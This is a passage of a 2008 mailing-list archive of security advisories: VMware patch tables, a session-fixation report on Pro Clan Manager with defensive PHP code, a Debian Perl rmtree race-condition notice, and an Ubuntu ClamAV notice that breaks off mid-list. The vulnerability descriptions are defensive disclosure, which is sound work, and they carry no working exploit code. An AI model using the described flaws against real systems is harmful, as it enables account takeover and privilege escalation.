    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-1372 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  ================    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      ESX350-200811406-SG
    ESX            3.0.3     ESX      ESX303-200811404-SG
    ESX            3.0.2     ESX      ESX-1006982
    ESX            2.5.5     ESX      affected, patch pending

    * hosted products are VMware Workstation, Player, ACE,
      Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   VMware Workstation 5.5.9
   ------------------------
   http://www.vmware.com/download/ws/ws5.html
   Release notes:
   http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html

   Windows binary:
   md5sum: 509c7b323a8ac42c0a92b0a1446bb0f8

   Compressed Tar archive for 32-bit Linux
   md5sum: 9d189e72f8111e44b27f1ee92edf265e

   Linux RPM version for 32-bit Linux
   md5sum: 0957c5258d033d0107517df64bfea240


   VMware Player 1.0.9
   -----------------------------
   http://www.vmware.com/download/player/
   Release notes Player 1.x:
   http://www.vmware.com/support/player/doc/releasenotes_player.html

   Windows binary
   md5sum: e2c8dd7b27df7d348f14f69de017b93f

   Player 1.0.9 for Linux (.rpm)
   md5sum: 471c3881fa60b058b1dac1d3c9c32c85

   Player 1.0.9 for Linux (.tar)
   md5sum: bef507811698e7333f5e8cb672530dbf


   VMware Server 1.0.8
   -------------------
   http://www.vmware.com/download/server/
   Release notes:
   http://www.vmware.com/support/server/doc/releasenotes_server.html

   VMware Server for Windows 32-bit and 64-bit
   md5sum: 4ba41e5fa192f786121a7395ebaa8d7c

   VMware Server Windows client package
   md5sum: f25746e275ca00f28d44ad372fc92536

   VMware Server for Linux
   md5sum: a476d3953ab1ff8457735e692fa5edf9

   VMware Server for Linux rpm
   md5sum: af6890506618fa82928fbfba8a5f97e1

   Management Interface
   md5sum: 5982b84a39479cabce63e12ab664d369

   VMware Server Linux client package
   md5sum: 605d7db48f63211cc3f5ddb2b3f915a6


   ESXi
   ----
   ESXi 3.5 patch ESXe350-200811401-O-SG
   http://download3.vmware.com/software/vi/ESXe350-200811401-O-SG.zip
   md5sum: e895c8cb0d32b722d7820d0214416092
   http://kb.vmware.com/kb/1007507

   NOTE: The three ESXi patches for Firmware "I", VMware Tools "T," and
         the VI Client "C" are contained in a single offline "O"
         download file.

   ESX
   ---
   ESX 3.5 patch ESX350-200811401-SG (memory corruption)
   http://download3.vmware.com/software/vi/ESX350-200811401-SG.zip
   md5sum: 988042ce20ce2381216fbe1862c3e66d
   http://kb.vmware.com/kb/1007501

   ESX 3.5 patch ESX350-200811406-SG (bzip2)
   http://download3.vmware.com/software/vi/ESX350-200811406-SG.zip
   md5sum: 285ec405ac34a196cbb796922e22cca2
   http://kb.vmware.com/kb/1007504

   ESX 3.0.3 patch ESX303-200811401-BG (memory corruption)
   http://download3.vmware.com/software/vi/ESX303-200811401-BG.zip
   md5sum: 26bf687a3483951d1f14ab66edf1d196
   http://kb.vmware.com/kb/1006986

   ESX 3.0.3 patch ESX303-200811404-SG (bzip2)
   http://download3.vmware.com/software/vi/ESX303-200811404-SG.zip
   md5sum: 2707e4a599867b0444e85a75a471ed4f
   http://kb.vmware.com/kb/1007198

   ESX 3.0.2 patch ESX-1006980 (memory corruption)
   http://download3.vmware.com/software/vi/ESX-1006980.tgz
   md5sum: 5e73f1585fea3ee770b2df2b94e73ca4
   http://kb.vmware.com/kb/1006980

   ESX 3.0.2 patch ESX-1006982 (bzip2)
   http://download3.vmware.com/software/vi/ESX-1006982.tgz
   md5sum: 4921cf542b5979bd0eef7f2c15683b71
   http://kb.vmware.com/kb/1006982

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4917
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372

- -------------------------------------------------------------------------
6. Change log

2008-12-02  VMSA-2008-0019
Initial security advisory after release of patches for ESXi, ESX 3.5,
ESX 3.0.3, ESX 3.0.2. Updated hosted products were previously released
on 2008-11-06.

- ------------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2008 VMware Inc.  All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iD8DBQFJNhfuS2KysvBH1xkRAt0NAJ0ap7HIEzEsxWxxeJbni4I5SaBeLACfdKSt
A0VgCubYwg7psnfOUEHM9+o=mieL
-----END PGP SIGNATURE-----

From - Wed Dec  3 11:27:48 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004cf3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38806-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 1BB4CED782
for <lists@securityspace.com>; Wed,  3 Dec 2008 11:27:41 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 5570C1438DA; Wed,  3 Dec 2008 07:45:21 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24938 invoked from network); 3 Dec 2008 12:36:43 -0000
Date: Wed, 3 Dec 2008 05:40:59 -0700
Message-Id: <200812031240.mB3CexL3003994@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: office@hackattack.at
To: bugtraq@securityfocus.com
Subject: [HACKATTACK Advisory 20081203]Pro Clan Manager 0.4.2 - Session
 Fixation
Status:   

[HACKATTACK Advisory 20081203]Pro Clan Manager 0.4.2 - Session Fixation

Details
************************
Product: Pro Clan Manager CMS
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.proclanmanager.com/
Vendor-Status: informed
Advisory-Status: not yet published

Credits
************************
Discovered by: David Vieira-Kurz
http://www.HACKATTACK.at || http://www.HACKATTACK.eu

Affected Products:
----------------------------
Pro Clan Manager 0.4.2 and prior

Original Advisory:
************************
http://www.HACKATTACK.at || http://www.HACKATTACK.eu

Introduction
************************
Pro Clan Manager is a PHP-based Content Management System.

More Details
************************
1. Cookie_Manipulation:
---------------------
The cookie variable "PHPSESSID" parameter can be set to a malicious and arbitrary value.

1.1 Description:
In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server.
After a user's session ID has been fixed, the attacker will wait for them to login.
Once the user does so, the attacker uses the predefined session ID value to assume their online identity.

Workaround:
************************
1. Do not accept session identifiers from GET / POST variables.
2.Regenerate SID on each request.
3. Accept only server generated SID:
One way to improve security is to not accept session identifiers not generated by server.

if ( ! isset( $_SESSION['SERVER_GENERATED_SID'] ) ) {
session_destroy(); // destroy all data in session
}
session_regenerate_id(); // generate a new session identifier
$_SESSION['SERVER_GENERATED_SID'] = true;


About HACKATTACK
===============HACKATTACK IT SECURITY GmbH is a Penetrationtest and security Auditinf company located in Austria and Germany.

Hotline Germany +49 (0)800 20 60 900
Hotline Austria +43 (0)06223 20 6210
More Information about HACKATTACK at
http://www.HACKATTACK.at || http://www.HACKATTACK.eu

From - Wed Dec  3 11:37:47 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004cf4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38804-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 2CE98ED77A
for <lists@securityspace.com>; Wed,  3 Dec 2008 11:34:26 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 7644A14371B; Wed,  3 Dec 2008 07:43:53 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18553 invoked from network); 3 Dec 2008 05:59:28 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
From: Steffen Joeris <white@debian.org>
Date: Wed, 03 Dec 2008 07:15:24 +0100
Message-ID: <87vdu1lr7n.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1678-1] New perl packages fix privilege escalation
Priority: urgent
Resent-Message-ID: <TECtiiibFTJ.A.PME.FQiNJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed,  3 Dec 2008 06:15:33 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1678-1                  security@debian.org
http://www.debian.org/security/                           Steffen Joeris
December 03, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : perl
Vulnerability  : design flaws
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-5302 CVE-2008-5303
Debian Bug     : 286905 286922

Paul Szabo rediscovered a vulnerability in the File::Path::rmtree
function of Perl. It was possible to exploit a race condition to create
setuid binaries in a directory tree or remove arbitrary files when a
process is deleting this tree.  This issue was originally known as
CVE-2005-0448 and CVE-2004-0452, which were addressed by DSA-696-1 and
DSA-620-1. Unfortunately, they were reintroduced later.

For the stable distribution (etch), these problems have been fixed in
version 5.8.8-7etch5.

For the unstable distribution (sid), these problems have been fixed in 
version 5.10.0-18 and will migrate to the testing distribution (lenny) 
shortly.

We recommend that you upgrade your perl packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5.dsc
    Size/MD5 checksum:      750 a57837967b7420057558cab7efca9202
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8.orig.tar.gz
    Size/MD5 checksum: 12829188 b8c118d4360846829beb30b02a6b91a7
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5.diff.gz
    Size/MD5 checksum:   105052 cfd4c3d27c5a7a342c441383867dae89

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.8-7etch5_all.deb
    Size/MD5 checksum:    41082 9dfa8758852aadcaadb2edbdfa17f942
  http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.8-7etch5_all.deb
    Size/MD5 checksum:  7378812 3baade38d4a703ae7db0e2f7d7b2df62
  http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.8-7etch5_all.deb
    Size/MD5 checksum:  2316518 dc45e7d6fbedf992db42f31326457df2

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_alpha.deb
    Size/MD5 checksum:  4150162 345ac6cfebda2d2e6807a1dc0e14957c
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_alpha.deb
    Size/MD5 checksum:     1006 f010eb97c3f81b2958c7546ba69296eb
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_alpha.deb
    Size/MD5 checksum:  2928894 52f0aa7e688e63cd4d487a6492d9ee2e
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_alpha.deb
    Size/MD5 checksum:    36236 eb16c8490e1e164ef6444f4b7680fbc6
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_alpha.deb
    Size/MD5 checksum:   821796 d48d9e6f1a07eafdc6acb6d990cf1fbc
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_alpha.deb
    Size/MD5 checksum:   880174 f32a7823fd919ada981b3eda1abe6a70

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_amd64.deb
    Size/MD5 checksum:   630776 4f134545671885f476770a9da3695301
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_amd64.deb
    Size/MD5 checksum:   806610 02ed83b2872342eb732c0179daa52869
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_amd64.deb
    Size/MD5 checksum:    32774 4db9f5a96272f4a561abadbc3a1ed175
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_amd64.deb
    Size/MD5 checksum:  4248964 b09695271b26cb6b6245a791e9e7122d
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_amd64.deb
    Size/MD5 checksum:  2735132 c8bb2c571273b1ef47beb05874ae4277
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_amd64.deb
    Size/MD5 checksum:     1010 4223d65b463272ca026ee7e7d7d0ff02

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_arm.deb
    Size/MD5 checksum:     1008 fd5146b7fceeb55c7ba16831e95f0b4a
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_arm.deb
    Size/MD5 checksum:   562112 24fe7aacf39d42673555f228e6edd5d7
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_arm.deb
    Size/MD5 checksum:    30338 57ce7264534de68fe870e72eaae6a186
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_arm.deb
    Size/MD5 checksum:  3410084 382ee29a48541e9270cb20926ff2c58a
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_arm.deb
    Size/MD5 checksum:   760136 6939901d705dbdac94e959ebab73d32a
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_arm.deb
    Size/MD5 checksum:  2548202 07796362a684d112be9dbea0ff5a2ab5

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_i386.deb
    Size/MD5 checksum:  3589118 bdcb99ed51d06b1639d98a661ce42d58
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_i386.deb
    Size/MD5 checksum:   527162 c511226a2cbddb98a170c8f563d6670a
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_i386.deb
    Size/MD5 checksum:   585396 f3f34d325de643667d4c12f897a15f48
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_i386.deb
    Size/MD5 checksum:    32070 59d70d1ee4f0e7584230095ca079ceb7
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_i386.deb
    Size/MD5 checksum:  2491980 7149381d9862cc1ebd20092fae76dda9
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_i386.deb
    Size/MD5 checksum:   762200 40254226d8ae5963a908661350816f0c

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_ia64.deb
    Size/MD5 checksum:   978092 e856d5880b7b4c26222a3e0a3e0e0610
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_ia64.deb
    Size/MD5 checksum:  3364496 8248ac1db0819b45b0ea5bf2ba748f6f
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_ia64.deb
    Size/MD5 checksum:  1154060 3ff9faa1f05b380c486a86f79e7993a0
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_ia64.deb
    Size/MD5 checksum:     1008 ce21fdde9f6a971ab9bb950d5a4f8846
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_ia64.deb
    Size/MD5 checksum:    51272 85acec2cd9ad024ec30e00a5af6f5ccb
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_ia64.deb
    Size/MD5 checksum:  4336594 d4756a2b2de75f43cdb2f8ff4ccc0566

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_mips.deb
    Size/MD5 checksum:  2782132 4999312ae9a1844b4d475f34d312d334
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_mips.deb
    Size/MD5 checksum:   694018 e974c764d6a3350e7425cf5990f02201
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_mips.deb
    Size/MD5 checksum:  3678988 94244c7432977a979063076fc67bbf29
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_mips.deb
    Size/MD5 checksum:    32216 cacc1e6e5d2649606ddccc99a9f09ebd
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_mips.deb
    Size/MD5 checksum:   786110 1713743185beb6ddc6de091ed4a7a0e5
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_mips.deb
    Size/MD5 checksum:     1008 905da3949be11e01942cb096f279cd63

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_powerpc.deb
    Size/MD5 checksum:   653440 4ccf1e83f3159d64262c9d30506e151a
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_powerpc.deb
    Size/MD5 checksum:  2710130 036b5620a814a6443d173a1a5f62a051
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_powerpc.deb
    Size/MD5 checksum:     1012 3bf894f640eeb63b15a997dbb1e06a63
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_powerpc.deb
    Size/MD5 checksum:    32908 bb7ccbed135a9625df993587576fbcf6
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_powerpc.deb
    Size/MD5 checksum:   811032 6ea8cf13343916db0f3e46c759f448da
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_powerpc.deb
    Size/MD5 checksum:  3824810 5864271ba481be6308ab9e704c2454c1

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_s390.deb
    Size/MD5 checksum:   823642 682e9f9fb581af9cc0aa9860c2747eba
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_s390.deb
    Size/MD5 checksum:    33108 311441a02f7965c21790d988b63879c6
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_s390.deb
    Size/MD5 checksum:  2796658 3b4c21061de13bec62299cfda17c21a8
  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_s390.deb
    Size/MD5 checksum:     1008 201b45bdbf264748d665b789e501e2c9
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_s390.deb
    Size/MD5 checksum:  4100050 c2348e4c49820501d30e3736bb60e442
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_s390.deb
    Size/MD5 checksum:   633612 6d818da26553af14a4479a23731ea8b0

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch5_sparc.deb
    Size/MD5 checksum:     1014 bd9f92414f3d44f15efa2c8b25fd39d9
  http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch5_sparc.deb
    Size/MD5 checksum:  3796714 95538b186d68bd25eec0dd3a27fe1447
  http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch5_sparc.deb
    Size/MD5 checksum:   783702 e07757e74203c7c8eec5f2db41051bc4
  http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch5_sparc.deb
    Size/MD5 checksum:    31056 d0ead72ea7bb47971f638ef7aee22705
  http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch5_sparc.deb
    Size/MD5 checksum:  2565984 253cc0540fbaead2b39bbcf9dda3ab96
  http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch5_sparc.deb
    Size/MD5 checksum:   594486 85b2168a8092deadace3044f51ebd20a


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJNiNUAAoJEL97/wQC1SS+xTwH/0zeSjj1pMV/opCTwn43mJol
fiGZ7O7Ng8o6Ps1fRuPZi+SdvaQxF3NbYWnyKikxY223AvLRlDQCPtbe0wZYf0bQ
6Cr9S+GaRTHd9UOg/4s2CE1clttlXRIzRQT9jTi/uycTr/JsAVUeWZ4LgrAq6P1l
qxMxiZddeH6BRHJbFgMKT8nhnLkAOztAqSlmZjA4XBlq/LH4RyGhprJh39zuG2Aq
U85a7vWzwwrH6EnfeYi4xS4i9kR5+YJUTvvgmdnYOfi6lOQl8Y3KG6Qeunmw/0gc
GjB7KcH1bUyj8hiS0zoMCbFwwCsodt5zfoieD82VtvRGAv+PoaH4ZL4O8MfYS0o�HH
-----END PGP SIGNATURE-----

From - Wed Dec  3 11:57:47 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004cf5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38802-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 41722ED846
for <lists@securityspace.com>; Wed,  3 Dec 2008 11:53:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id E8EA8143783; Wed,  3 Dec 2008 07:42:09 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10261 invoked from network); 2 Dec 2008 22:04:30 -0000
Date: Tue, 2 Dec 2008 14:20:25 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-684-1] ClamAV vulnerability
Message-ID: <20081202222025.GH25309@outflux.net>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="zx4FCpZtqtKETZ7O"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.63 on 10.2.0.1
Status:   


--zx4FCpZtqtKETZ7O
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-684-1          December 02, 2008
clamav vulnerability
https://bugs.launchpad.net/bugs/304017
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  libclamav5                      0.94.dfsg.2-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Ilja van Sprundel discovered that ClamAV did not handle recursive JPEG
information.  If a remote attacker sent a specially crafted JPEG file,
ClamAV would crash, leading to a denial of service.


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1.diff.gz
      Size/MD5:   159258 35b619fff489b7fdbfacd86170572cfa
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1.dsc
      Size/MD5:     1545 d35181ceb4a8b93aa8ef3d80f424a52e
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2.orig.tar.gz
      Size/MD5: 22073819 7b45b0c54b887b23cb49e4bff807cf58

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.94.dfsg.2-1ubuntu0.1_all.deb
      Size/MD5: 19497162 d2d7052e4859a66f9556a33839be072b
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.94.dfsg.2-1ubuntu0.1_all.deb
      Size/MD5:  1077346 0c0e57cf0a6d5004611621c81d158b3e
    http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.94.dfsg.2-1ubuntu0.1_all.deb
      Size/MD5:   208058 8dd86c35b97cfa0c111ec6a99f90d7b4

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_amd64.deb
      Size/MD5:   239628 465bacd5ebfec386196f83b90c59b1d5
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_amd64.deb
      Size/MD5:   914866 309f142bd797da5b06bae9f3273c729a
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_amd64.deb
      Size/MD5:   255448 b28942a9a6ecd5b09eea78f22f56658c
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.94.dfsg.2-1ubuntu0.1_amd64.deb
      Size/MD5:   235612 d7fc1fbc5112f2b8b4bb81f26f8495bd
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.94.dfsg.2-1ubuntu0.1_amd64.deb
      Size/MD5:   573860 1a499485cdee3a5ed728fdb115d4708e
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav5_0.94.dfsg.2-1ubuntu0.1_amd64.deb
      Size/MD5:   538626 f1ec69b8d9bc15cf1b6ab9b483b37568
    http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.94.dfsg.2-1ubuntu0.1_amd64.deb
      Size/MD5:   232722 4abb421ae13f2c04ccf7e975d68344f1

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.94.dfsg.2-1ubuntu0.1_i386.deb
      Size/MD5:   233172 1e14e971a76712c4a38d3250e3f84a4f
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.94.dfsg.2-1ubuntu0.1_i386.deb
      Size/MD5:   849368 dc7e8747a2f1b40db10fd3dfa80d6d8f
    http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.94.dfsg.2-1ubuntu0.1_i386.deb
